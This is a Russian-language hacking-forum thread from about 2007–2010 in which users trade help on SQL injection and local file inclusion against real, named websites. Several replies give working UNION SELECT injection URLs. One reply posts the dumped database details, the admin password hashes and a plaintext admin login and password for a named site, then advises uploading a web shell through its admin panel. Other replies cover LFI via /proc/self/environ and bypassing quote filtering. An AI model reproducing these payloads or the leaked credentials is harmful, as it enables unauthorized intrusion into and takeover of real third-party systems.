Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    ребята, у меня 3 вопроса вот уже долго инетресуеют, но думал со временем пойму, но не смог :))

    1. Как понять запрос: and 1=0, или or 1=1
    2. когда запрос начинается с ?id=-11+union.... - это значит именно этот - (минус) в начале ?
    3. часто, или постоянно в инексиях замечаю такое:
    select+1,2,3,4,5,6,7,8,9,10,11,12.. или такое: /../../../../../
    можете обяснить что это значит и от чего зависит длина :) т.е. откуда берется эти цифры.
     
  2. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Для кого статьи придумали?
    1. 1 никогда не 0, условие не выполняется, нужно для скуль
    0 равно 0, выполняется, также ноебходмо
    2. минус ставится, чтобы в Бд не было такого айди дабы выводились видимые поля
    3. цифры - для поиска выводимых полей. ../ - для инклуда файлов, пднятие по каталогам


    Вообще, почитай статьи
     
  3. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+order+by+20 -true

    http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+and+1=1 -true

    http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+and+substring(@@version,1,1)=3,4,5 -false

    как прокрутить скуль?
     
    #11023 Micr0b, 10 Jan 2010
    Last edited: 10 Jan 2010
  4. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Может быть тут нужно условие?)
    http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+and+if%28substring%28@@version,1%20,1%29=1,1,0%29
    Не пробывал,но помоему оно необходимо :)
     
  5. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26

    false(
     
  6. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Причём тут http://www.korea.net/? Совсем другой сайт.
     
    1 person likes this.
  7. Gidz

    Gidz New Member

    Joined:
    10 Aug 2009
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    Возможно скрипт работает с другой БД.Укажите в запросе имя БД
    Code:
    -11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+[B]database[/B].tablename+--+
    Имя базы данных:
    Code:
    -11+union+select+1,2,3,concat_ws(0x3a,table_name,table_schema),5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+

    Зы:Может не хватать прав на доступ
    спасибо) А можно немного по подробней, из=за чего не отображалось с "-" а с "999999999999" заработало? и что означает "-+&sec=2"?
    ____________________________________
    И еще я сюда напишу сразу, может кто подскажет, я тут перечитываю заново некоторые статьи, например вот в этой https://forum.antichat.ru/thread19844.html написано,
    как искать подобного рода уязвимости? почти все статьи что я читаю указывают параметр "?id=" и дальше пробовать подставлять разные значения, но тоесть получается не обязательно нужен "?id=" ? но и любой параметр подойдет, например встречал "?int=" "?e=" "?i=" , с ними также пробовать подставлять, или вообще на сайте (в урле) искать любое числовое значение и пробовать менять и подставлять к нему данные?
     
    #11027 Gidz, 11 Jan 2010
    Last edited: 11 Jan 2010
  8. FaTRuS

    FaTRuS Elder - Старейшина

    Joined:
    28 Aug 2006
    Messages:
    94
    Likes Received:
    2
    Reputations:
    0
    http://clean.kz/index.php?act=
    Выдает ошибку Warning: main(/home/clean/data/public_html/modules/.php)
    можно ли произвести локальный инклуд

    И еще как узнать название всех таблиц в sql 4.1.25
     
    #11028 FaTRuS, 11 Jan 2010
    Last edited: 11 Jan 2010
  9. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Помоему просто мусор. Можно так.
    http://asiane wsnet.net/news.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
    На счёт второго вопроса, можно и с id=, и с int= и e=, это просто другие названия переменных и не более...Моё имхо, лучше для начала сделать простенький сайтец, php+mysql+ещё что-то), желательно с нуля, после чего тебе будет всё более понятней и интересней. Ествественно в ходе создания сайта, в теории ты выучишь хотя php и mysql.. Потому как сразу без какого-то рабочего опыта, будет сложновато.

    Так как там magic_quotes_gpc=on, то нулем не заменишь, разве что через /////////[...].
     
    #11029 v1d0qz, 11 Jan 2010
    Last edited: 11 Jan 2010
    1 person likes this.
  10. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Торможу, не спал вторые сутки.Сильно не пинайте =)
    Не могу обрезать запрос, как только не пробовал, добавляется ,3
     
  11. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    2FaTRuS
    шото канешн инклюдится!
    http://clean.kz/index.php?act=../index

    но тама base_dir() (
     
  12. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Заюзай заместо /*, +--+
     
  13. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    /* и +--+ и +--+- и { и # и -- и вообще без close, все равно
    Уже всю голову поломал себе... Разве никто не сталкивался? Спать хочу =(
     
  14. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    У тебя инъекция в лимите походу
     
    2 people like this.
  15. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,178
    Likes Received:
    617
    Reputations:
    690
    Code:
    http://clean.kz/index.php?act=idx&id=-53+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user())--
    User : mysql_clean@localhost
    Version : 4.1.25
    Database : intserv_clean
    OS : freebsd 6.3


    Code:
    http://clean.kz/index.php?act=idx&id=-53+union+select+1,2,3,4,concat_ws(0x3a,login,pass)+from+admin--
    7b8fbb831c7c7163aa67b658ab3f3d64:28f9fb91cebfd9e08dfc467ac2d735d9
    http://clean.kz/admin/
    Логин : cleanadmin
    Пароль : 93mgpt5hm

    В админке через "Редактор содержания" можешь залить шелл.
    Таблицы в 4 ветке брутит надо (юзай SIPT)
     
    _________________________
    #11035 shell_c0de, 12 Jan 2010
    Last edited: 12 Jan 2010
    2 people like this.
  16. FaTRuS

    FaTRuS Elder - Старейшина

    Joined:
    28 Aug 2006
    Messages:
    94
    Likes Received:
    2
    Reputations:
    0
    Спасибо за помощь
     
  17. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    Попробуй # в urlencode
     
    1 person likes this.
  18. Gidz

    Gidz New Member

    Joined:
    10 Aug 2009
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    народ, подскажите плз, что можно еще сделать.. допустим есть сайт, с ошибкой, пробую провести sql inj, вижу version() user() database(), кавычки не слешируются(magic_quotes_gpc = Off ?), пытаюсь вывести /etc/passwd , ничего не показывает, загрузить также ничего не смог, не хватает прав. Пытаюсь просмотреть таблицу, все поля выводит, но ничего интересного не могу найти, ни username, admin и тп, ничего нет. Что еще можно попробовать?

    зы И вот еще
    +group+by+1+--+ - пишет ошибку
    +group+by+0+--+ - ошибки нет
    как так может быть?
     
    #11038 Gidz, 12 Jan 2010
    Last edited: 12 Jan 2010
  19. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Ну если только у скули есть file_priv, не фильтруються кавычки, но нету прав для записи в папку доступной из веба, и есть lfi, то ты понел да?у /proc/self/enivron, насколько я знаю есть права на запись, ну ты понел?
     
  20. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    1) В скуле нет.
    2) Шелл можно проинклюдить только при allow_url_include = On, а всегда можно выполнить произвольный PHP код.
     
    1 person likes this.
Thread Status:
Not open for further replies.